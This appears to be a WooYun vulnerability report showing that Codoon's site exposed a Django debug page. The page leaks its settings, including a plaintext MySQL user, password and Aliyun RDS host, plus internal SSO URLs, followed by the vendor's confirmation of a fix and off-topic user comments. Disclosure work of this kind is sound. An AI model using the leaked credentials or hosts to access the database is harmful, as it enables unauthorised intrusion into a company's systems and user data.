('en-gb', 'British English'), ('es', 'Spanish'), ('es-ar', 'Argentinian Spanish'), ('es-mx', 'Mexican Spanish'), ('es-ni', 'Nicaraguan Spanish'), ('et', 'Estonian'), ('eu', 'Basque'), ('fa', 'Persian'), ('fi', 'Finnish'), ('fr', 'French'), ('fy-nl', 'Frisian'), ('ga', 'Irish'), ('gl', 'Galician'), ('he', 'Hebrew'), ('hi', 'Hindi'), ('hr', 'Croatian'), ('hu', 'Hungarian'), ('id', 'Indonesian'), ('is', 'Icelandic'), ('it', 'Italian'), ('ja', 'Japanese'), ('ka', 'Georgian'), ('km', 'Khmer'), ('kn', 'Kannada'), ('ko', 'Korean'), ('lt', 'Lithuanian'), ('lv', 'Latvian'), ('mk', 'Macedonian'), ('ml', 'Malayalam'), ('mn', 'Mongolian'), ('nl', 'Dutch'), ('no', 'Norwegian'), ('nb', 'Norwegian Bokmal'), ('nn', 'Norwegian Nynorsk'), ('pa', 'Punjabi'), ('pl', 'Polish'), ('pt', 'Portuguese'), ('pt-br', 'Brazilian Portuguese'), ('ro', 'Romanian'), ('ru', 'Russian'), ('sk', 'Slovak'), ('sl', 'Slovenian'), ('sq', 'Albanian'), ('sr', 'Serbian'), ('sr-latn', 'Serbian Latin'), ('sv', 'Swedish'), ('ta', 'Tamil'), ('te', 'Telugu'), ('th', 'Thai'), ('tr', 'Turkish'), ('uk', 'Ukrainian'), ('ur', 'Urdu'), ('vi', 'Vietnamese'), ('zh-cn', 'Simplified Chinese'), ('zh-tw', 'Traditional Chinese'))DATABASE_ENGINE ''DATABASE_NAME ''COMMENTS_FIRST_FEW 0PREPEND_WWW FalseSESSION_COOKIE_HTTPONLY FalseDATABASE_PORT ''DEBUG_PROPAGATE_EXCEPTIONS FalseIMG_URL 'http://img2.a.com'MONTH_DAY_FORMAT 'F j'LOGIN_URL '/accounts/login/'SESSION_EXPIRE_AT_BROWSER_CLOSE FalseSAE_MYSQL_PASS 'aliyunmysql5401036'TIME_FORMAT 'P'REDIRECT_URL 'http://gongyi.codoon.com'DATE_INPUT_FORMATS ('%Y-%m-%d', '%m/%d/%Y', '%m/%d/%y', '%b %d %Y', '%b %d, %Y', '%d %b %Y', '%d %b, %Y', '%B %d %Y', '%B %d, %Y', '%d %B %Y', '%d %B, %Y')CSRF_COOKIE_NAME 'csrftoken'EMAIL_HOST_PASSWORD '********************'PASSWORD_RESET_TIMEOUT_DAYS '********************'CACHE_MIDDLEWARE_ALIAS 'default'SESSION_SAVE_EVERY_REQUEST FalseADMIN_MEDIA_PREFIX '/static/admin/'NUMBER_GROUPING 0SAE_MYSQL_HOST 'rdsfviy3ifviy3i1367979506919.mysql.rds.aliyuncs.com'SESSION_ENGINE 'django.contrib.sessions.backends.db'CSRF_FAILURE_VIEW 'django.views.csrf.csrf_failure'COMMENTS_SKETCHY_USERS_GROUP NoneLOGIN_REDIRECT_URL '/accounts/profile/'IMG2_URL 'http://img2.a.com'LOGGING {'disable_existing_loggers': False, 'handlers': {'mail_admins': {'class': 'django.utils.log.AdminEmailHandler', 'level': 'ERROR'}}, 'loggers': {'django.request': {'handlers': ['mail_admins'], 'level': 'ERROR', 'propagate': True}}, 'version': 1}CACHE_MIDDLEWARE_KEY_PREFIX ''LOCALE_PATHS ()TEMPLATE_STRING_IF_INVALID ''COMMENTS_ALLOW_PROFANITIES FalseLOGOUT_URL '/accounts/logout/'EMAIL_USE_TLS FalseTEMPLATE_DIRS ('/var/www/ncodoon/gongyi/templates',)FIXTURE_DIRS ()EMAIL_HOST 'localhost'DATE_FORMAT 'Y-m-d'SAE_MYSQL_DB 'app_codoon'MEDIA_ROOT '/var/www/ncodoon/gongyi/media'ADMINS ()FORMAT_MODULE_PATH NoneDEFAULT_FROM_EMAIL 'webmaster@localhost'VAR_DICT {'db': ('aliyunmysql', 'aliyunmysql5401036', 'rdsfviy3ifviy3i1367979506919.mysql.rds.aliyuncs.com'), 'home_url': 'http://www.a.com/home', 'img2_url': 'http://img2.a.com', 'media_url': '/media', 'mom_url': 'http://mom.a.com:8003', 'sso_url': 'http://sso.a.com:8002'}STATICFILES_DIRS ()MEDIA_URL '/media'DATETIME_FORMAT 'Y-m-d H:i'IGNORABLE_404_STARTS ('/cgi-bin/', '/_vti_bin', '/_vti_inf')SITE_ID 1DISALLOWED_USER_AGENTS ()ALLOWED_INCLUDE_ROOTS ()API_DOMAIN 'http://api.codoon.com'SSO_DOMAIN 'http://sso.a.com:8002'SHORT_DATE_FORMAT 'm/d/Y'DATABASE_USER ''TEST_RUNNER 'django.test.simple.DjangoTestSuiteRunner'TIME_ZONE 'Asia/Shanghai'FILE_UPLOAD_MAX_MEMORY_SIZE 2621440EMAIL_BACKEND 'django.core.mail.backends.smtp.EmailBackend'DEFAULT_TABLESPACE ''TEMPLATE_CONTEXT_PROCESSORS ('django.core.context_processors.debug', 'django.core.context_processors.i18n', 'django.core.context_processors.media', 'django.core.context_processors.request', 'gongyi.common.context_processors.config')SITE_DOMAIN 'http://www.codoon.com'SESSION_COOKIE_AGE 1209600SETTINGS_MODULE 'settings'USE_ETAGS FalseSITE_ROOT '/var/www/ncodoon/gongyi'MOM_DOMAIN 'http://mom.a.com:8003'LANGUAGES_BIDI ('he', 'ar', 'fa')DEFAULT_INDEX_TABLESPACE ''INTERNAL_IPS ()STATIC_URL '/static/'EMAIL_PORT 25SHORT_DATETIME_FORMAT 'm/d/Y P'ABSOLUTE_URL_OVERRIDES {}DATABASE_OPTIONS {}CACHE_MIDDLEWARE_SECONDS 600BANNED_IPS ()DATETIME_INPUT_FORMATS ('%Y-%m-%d %H:%M:%S', '%Y-%m-%d %H:%M', '%Y-%m-%d', '%m/%d/%Y %H:%M:%S', '%m/%d/%Y %H:%M', '%m/%d/%Y', '%m/%d/%y %H:%M:%S', '%m/%d/%y %H:%M', '%m/%d/%y')DATABASE_PASSWORD '********************'COMMENTS_MODERATORS_GROUP NonePROFANITIES_LIST '********************'SAE_MYSQL_PORT '3306'EMAIL_HOST_USER ''COMMENTS_BANNED_USERS_GROUP NoneYou're seeing this error because you have DEBUG = True in your Django settings file. Change that to False, and Django will display a standard 500 page.
你懂得
危害等级:中
漏洞Rank:6
确认时间:2013-08-03 10:57
谢谢,已修改
暂无
@咕咚网 你们的手环啥时候发布哇!!!
@z@cx - -不要问我
求咕咚手环求咕咚手环求咕咚手环求咕咚手环求咕咚手环求咕咚手环求咕咚手环求咕咚手环求咕咚手环求咕咚手环求咕咚手环求咕咚手环求咕咚手环求咕咚手环求咕咚手环求咕咚手环求咕咚手环求咕咚手环求咕咚手环求咕咚手环求咕咚手环求咕咚手环求咕咚手环求咕咚手环求咕咚手环求咕咚手环
@mango 这是刷屏的节奏···
@我是小号 - -
![~(]V08GJ5WP{X7VQ5@R[D84.jpg](https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/201308/02220154b79ff681ff597362cb61a3097634391c.jpg)
![1H4WAT{QIZU8}FP0I_T]V{5.jpg](https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/201308/02220403994a8fd4053c790a0bbf646093263969.jpg)
